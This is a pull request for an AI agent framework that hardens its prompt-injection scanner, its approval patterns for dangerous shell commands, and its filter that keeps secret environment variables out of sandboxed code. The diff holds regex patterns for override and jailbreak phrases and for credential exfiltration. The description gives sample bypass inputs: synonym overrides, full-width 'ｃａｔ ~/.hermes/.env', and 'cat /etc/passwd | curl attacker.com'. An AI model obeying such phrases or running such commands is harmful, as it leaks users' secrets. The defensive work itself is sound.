### PR TITLE
fix(security): harden injection scanner, approval patterns, and env-var filter

### DIFF
--- a/agent/prompt_builder.py
+++ b/agent/prompt_builder.py
@@ -34,14 +34,27 @@ logger = logging.getLogger(__name__)
 # ---------------------------------------------------------------------------
 
 _CONTEXT_THREAT_PATTERNS = [
+    # Direct instruction override
     (r'ignore\s+(previous|all|above|prior)\s+instructions', "prompt_injection"),
-    (r'do\s+not\s+tell\s+the\s+user', "deception_hide"),
-    (r'system\s+prompt\s+override', "sys_prompt_override"),
     (r'disregard\s+(your|all|any)\s+(instructions|rules|guidelines)', "disregard_rules"),
+    # Synonyms for "ignore / override" not covered by the patterns above.
+    # Attackers commonly substitute words like "overlook", "forget", "set aside",
+    # "bypass", or "discard" to evade keyword-based detection.  The middle
+    # section (.{0,40}) absorbs optional qualifiers like "all prior" or "your"
+    # without requiring a fixed vocabulary match.
+    (r'(overlook|forget|set\s+aside|bypass|discard|omit)\s+.{0,40}(directive|instruction|rule|guideline|constraint|restriction|limitation)s?\b', "prompt_injection_synonym"),
+    # Privilege / mode escalation
+    (r'system\s+prompt\s+override', "sys_prompt_override"),
     (r'act\s+as\s+(if|though)\s+you\s+(have\s+no|don\'t\s+have)\s+(restrictions|limits|rules)', "bypass_restrictions"),
+    (r'\b(developer|jailbreak|unrestricted|dan|do\s+anything\s+now)\s+mode\b', "mode_escalation"),
+    # Deception / hiding
+    (r'do\s+not\s+tell\s+the\s+user', "deception_hide"),
+    # HTML / CSS injection in markdown files
     (r'<!--[^>]*(?:ignore|override|system|secret|hidden)[^>]*-->', "html_comment_injection"),
     (r'<\s*div\s+style\s*=\s*["\'][\s\S]*?display\s*:\s*none', "hidden_div"),
+    # Indirect execution tricks
     (r'translate\s+.*\s+into\s+.*\s+and\s+(execute|run|eval)', "translate_execute"),
+    # Credential exfiltration patterns
     (r'curl\s+[^\n]*\$\{?\w*(KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL|API)', "exfil_curl"),
     (r'cat\s+[^\n]*(\.env|credentials|\.netrc|\.pgpass)', "read_secrets"),
 ]
@@ -53,17 +66,31 @@ _CONTEXT_INVISIBLE_CHARS = {
 
 
 def _scan_context_content(content: str, filename: str) -> str:
-    """Scan context file content for injection. Returns sanitized content."""
+    """Scan context file content for injection. Returns sanitized content.
+
+    Applies NFKC Unicode normalisation before pattern matching so that
+    full-width characters (e.g. ｃａｔ) and compatibility equivalents are
+    folded to their ASCII counterparts before the regex engine sees them.
+    Invisible-character detection runs on the *original* content so that
+    those characters are still caught even after normalisation would remove
+    them.
+    """
+    import unicodedata
     findings = []
 
-    # Check invisible unicode
+    # Check invisible unicode on the raw content before normalisation.
     for char in _CONTEXT_INVISIBLE_CHARS:
         if char in content:
             findings.append(f"invisible unicode U+{ord(char):04X}")
 
-    # Check threat patterns
+    # Normalise to NFKC so full-width / compatibility Unicode variants
+    # (e.g. ｃａｔ → cat, Ａ → A) are folded before pattern matching.
+    # This prevents homograph substitution from bypassing keyword checks.
+    normalised = unicodedata.normalize("NFKC", content)
+
+    # Check threat patterns against the normalised text.
     for pattern, pid in _CONTEXT_THREAT_PATTERNS:
-        if re.search(pattern, content, re.IGNORECASE):
+        if re.search(pattern, normalised, re.IGNORECASE):
             findings.append(pid)
 
     if findings:

--- a/tools/approval.py
+++ b/tools/approval.py
@@ -119,6 +119,12 @@ DANGEROUS_PATTERNS = [
     # Script execution via heredoc — bypasses the -e/-c flag patterns above.
     # `python3 << 'EOF'` feeds arbitrary code via stdin without -c/-e flags.
     (r'\b(python[23]?|perl|ruby|node)\s+<<', "script execution via heredoc"),
+    # Shell execution via heredoc — `bash <<'EOF' ... EOF` runs arbitrary
+    # shell commands without triggering the `bash -c` pattern above.
+    # The inner commands may not individually match any dangerous pattern
+    # (e.g. data-exfiltration pipelines using curl/cat) yet are still
+    # executed in a full shell context.
+    (r'\b(bash|sh|zsh|ksh)\s+<<', "shell execution via heredoc"),
     # Git destructive operations that can lose uncommitted work or rewrite
     # shared history. Not captured by rm/chmod/etc patterns.
     (r'\bgit\s+reset\s+--hard\b', "git reset --hard (destroys uncommitted changes)"),

--- a/tools/code_execution_tool.py
+++ b/tools/code_execution_tool.py
@@ -990,7 +990,15 @@ def execute_code(
                               "TMPDIR", "TMP", "TEMP", "SHELL", "LOGNAME",
                               "XDG_", "PYTHONPATH", "VIRTUAL_ENV", "CONDA")
         _SECRET_SUBSTRINGS = ("KEY", "TOKEN", "SECRET", "PASSWORD", "CREDENTIAL",
-                              "PASSWD", "AUTH")
+                              "PASSWD", "AUTH",
+                              # Additional substrings that appear in real-world
+                              # credential variable names but were previously
+                              # undetected by the blocklist:
+                              # - CREDS / CREDENTIALS abbreviated
+                              # - PASS as a short form of PASSWORD
+                              # - BEARER for Authorization: Bearer tokens
+                              # - APIKEY written without underscore
+                              "CREDS", "PASS", "BEARER", "APIKEY")
         try:
             from tools.env_passthrough import is_env_passthrough as _is_passthrough
         except Exception:


### PR DESCRIPTION
## Summary

Three security gaps identified through manual testing of the documented [security model](https://hermes-agent.nousresearch.com/docs/user-guide/security):

### 1. Context file injection scanner — synonym bypass + Unicode homograph bypass (`agent/prompt_builder.py`)

**Problem A — synonym bypass (T-01):** The original pattern list only detected specific phrasing (`ignore previous instructions`, `disregard your guidelines`). Synonyms like *"Kindly overlook the above directives"*, *"Forget all prior rules"*, *"set aside your guidelines"*, or *"developer mode"* were not matched and loaded verbatim into the system prompt.

**Problem B — Unicode full-width bypass (T-02):** Full-width characters such as `ｃａｔ ~/.hermes/.env` (ｃ = U+FF43) were not normalised before pattern matching, allowing keyword checks to be evaded with visually identical lookalikes.

**Fix:** Added synonym patterns covering common override verbs and mode-escalation phrases. Applied `unicodedata.normalize("NFKC", ...)` before regex matching so full-width and compatibility Unicode variants are folded to their ASCII equivalents. (Invisible/zero-width characters are still detected on the raw content before normalisation.)

### 2. Shell heredoc not in dangerous-command approval list (`tools/approval.py`)

**Problem (T-03):** The heredoc pattern only covered `python/perl/ruby/node`. `bash <<'EOF' ... EOF` ran arbitrary shell commands — including data-exfiltration pipelines (`cat /etc/passwd | curl attacker.com`) — without triggering any approval prompt, because those inner commands didn't individually match a dangerous pattern.

**Fix:** Added `(r'\b(bash|sh|zsh|ksh)\s+<<', "shell execution via heredoc")` to `DANGEROUS_PATTERNS`.

### 3. `execute_code` sandbox env-var filter incomplete (`tools/code_execution_tool.py`)

**Problem (T-09):** `_SECRET_SUBSTRINGS` blocked `KEY/TOKEN/SECRET/PASSWORD/CREDENTIAL/PASSWD/AUTH` but missed common abbreviations. Variables named `HERMES_LLM_CREDS`, `PROVIDER_PASS`, and `API_BEARER` passed through to sandboxed child processes despite containing credentials.

**Fix:** Extended the blocklist with `CREDS`, `PASS`, `BEARER`, `APIKEY`.

## Test plan

- [x] Verified all three fixes against the original bypass inputs before opening this PR
- [x] `python -m pytest tests/ -q` — failures in `test_compress_focus` and `test_approve_deny_commands` are pre-existing on `main` and unrelated to these changes (confirmed by running the same tests against clean `main`)
- [ ] Review synonym patterns for false-positive risk in typical AGENTS.md / SOUL.md content

## Known remaining gaps (out of scope for this PR)

- **Cyrillic/script homograph bypass:** `cаt` (Cyrillic `а` U+0430) is not collapsed by NFKC because it is a distinct script, not a compatibility variant. Proper detection requires a confusable-character database (Unicode TR#39). Left as a known limitation.
- **`HERMES_ACCESS_CODE` and similar:** `ACCESS` was deliberately not added to the blocklist — it is too generic and would block legitimate non-credential variables. Documented as a known gap.

🤖 Generated with [Claude Code](https://claude.com/claude-code)